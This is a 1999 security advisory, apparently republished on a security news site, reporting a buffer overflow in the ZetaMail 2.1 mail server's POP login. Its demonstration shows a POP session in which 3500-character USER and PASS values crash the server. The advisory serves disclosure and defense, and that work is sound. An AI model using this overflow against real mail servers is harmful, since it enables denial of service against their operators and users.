Skip navigation
Menu
Security

ZetaMail 2.1 Subject to DoS - 17 Nov 1999

ZetaMail 2.1 Subject to DoS
Reported November 19, 1999 by USSRLABS
VERSIONS AFFECTED
  • ZetaMail 2.1

DESCRIPTION

UssrLabs discoverd a buffer overflow condition in ZetaMail 2.1 mail server -- the condition is present in the server"s user login sequence.

DEMONSTRATION

POP Overflow:

Connected to example.com.
Escape character is "^\]".
+OK ZetaMail for 95 BD0211 <4294764405.063903189415041@itsme>
USER buffer
+OK Send password
PASS buffer

Where buffer is 3500 characters.

VENDOR RESPONSE

UssrLabs notified Nosque Workshop of this problem. Vendor response is unknown at this time, however, the vendor"s MsgCore products do not appear to have buffer overflow problems - consider using them instead of Zetamail.

CREDITS
Discovered by USSRLABS
Posted here at NTSecurity.net on November 19, 1999
Hide comments

More information about text formats

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish
Recommended Reading
a digital padlock icon with multiple colors
Cybersecurity Workforce Sustainability Has a Problem. DEI Could Be the Solution.
May 06, 2024
the word acronym spelled out with wooden pieces
Cybersecurity Acronyms Cheat Sheet
May 06, 2024
clinician securely sharing sensitive healthcare data across mobile devices and medical practices
How to Ensure Data Protection, IT Security, and Compliance in Life Sciences
Apr 30, 2024
DevSecOps concept
90% of Java Services in Production Have Vulnerability Risk, DevSecOps Report Finds
Apr 20, 2024